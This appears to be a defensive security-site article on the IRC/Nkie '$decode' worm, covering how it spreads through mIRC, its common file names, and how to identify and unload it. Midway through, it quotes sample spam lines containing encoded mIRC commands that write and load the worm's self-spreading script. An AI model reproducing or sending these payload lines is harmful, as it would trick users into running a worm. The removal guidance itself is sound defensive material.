Information
 Trojan Horses
Anti-Virus Precautions
System Security
Port Numbers & Services
Windows Start-Up Methods
Tools & Instructions
GT-Bot Removal
VBS/Karma
Worm Removal
Aplore
Worm Removal
Nkie
Worm Removal
Blaster
Worm Removal
Guides
Recovering from a Security Breach
Detecting
& Removing Trojans
Securing
Your Network
Identifying
Malicious Scripts
|
The IRC/Nkie worm is among the top five most common IRC worms today.
It is
also the least documented worm on the internet.
This worm is commonly called the $decode worm on
IRC. The original $decode
is a mIRC script named nkie.txt. It is triggered when someone types
!list in
any channel an infected user is in. The trigger is a simple mIRC
code sent
encrypted to the person who typed the !list command.
Today there are many variants, all of these spam
encrypted mIRC code to
anyone that either types a trigger, or joins/parts a channel the
infected
user is in. Some variants have a timer in the code that waits for
a few
seconds, then spams the code only if the user is not oped. This
is to
prevent channel moderators from seeing the spam and kicking the
infected
user. Most people do not even realize they have this worm until
they are
kicked from an IRC channel with instructions to join #NoHack. To
date the
worm has no destructive payload, but that could change. As with
any worm,
care should be taken when removing.
The worm spreads by spaming people over IRC networks with messages
similar
to these:
<cooleun> hey Golcor to get OPs use
this hack in the chan but SHH!
//$decode( d3JpdGUgxCAkcmVhZCgkc2NyaXB0LG4sMSk= ,m) |
$decode( LmxvYWQgLXJzIMQ= ,m)
<^BlueyEBOy^> STOP SPAM, USE THIS
COMMAND: //write nospam
$decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZy
AkbmljayBTVE9QIFNQQU0sIFVTRSBUSElTIENPTU1BTkQ6AzQgLy93cml0
ZSBub3NwYW0gJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcm
lwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIG5vc3Bhb
SAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfSB9,m) | .load -rs
nospam | //mode $me +R
It works with the $decode() and $encode() methods built into the
mIRC
scripting language. When a user gets spammed with one of these messages,
and
then copies the text into the edit box, the text is interpreted
by mIRC and
executed as if the user had typed the command in plainly. Although
the
scripts vary on what they say, the theme is the same: They write
a small
script to the mIRC folder, load it into the remote section of mIRC,
and then
go to work spamming others, enticing them to copy and paste too.
Any name
can be given to the file. Some common file names include:
Ä
chat
dab.txt
god.dll
hack
mirc32.ini
nkie.txt
nospam
twg.txt
s.txt
vv.pif
Because it is a simple spam worm, removal is easy: Simply unload
and delete
the script. If you have a lot of scripts loaded you will have to
determine
which script(s) are spamming. One easy way to do this is to copy
the last
part of the actual message you are spamming and /echo it back to
yourself in
the status window. Taking the first example from above, you would
copy
$decode( LmxvYWQgLXJzIMQ= ,m) to the clipboard. Then in the status
window
type:
//echo -a . $decode( LmxvYWQgLXJzIMQ= ,m)
This will reveal the file name of the script. All $decode worms
will have a
load command after the final "|" character. In this case
we see that .load
-rs Ä is the final command, giving us the file name Ä,
or ASCII character
142. You can type this letter by holding down the ALT key and pressing
142
on the numeric pad, then release the ALT key. Regardless of the
temptation
or promises, do not copy and paste anything in mIRC you do not understand.
This worm is a new spin on an old trick. The same thing used to
be achieved
by getting users to copy endless $chr() characters into the edit
box, which
will execute any command given as if it was typed normally.
|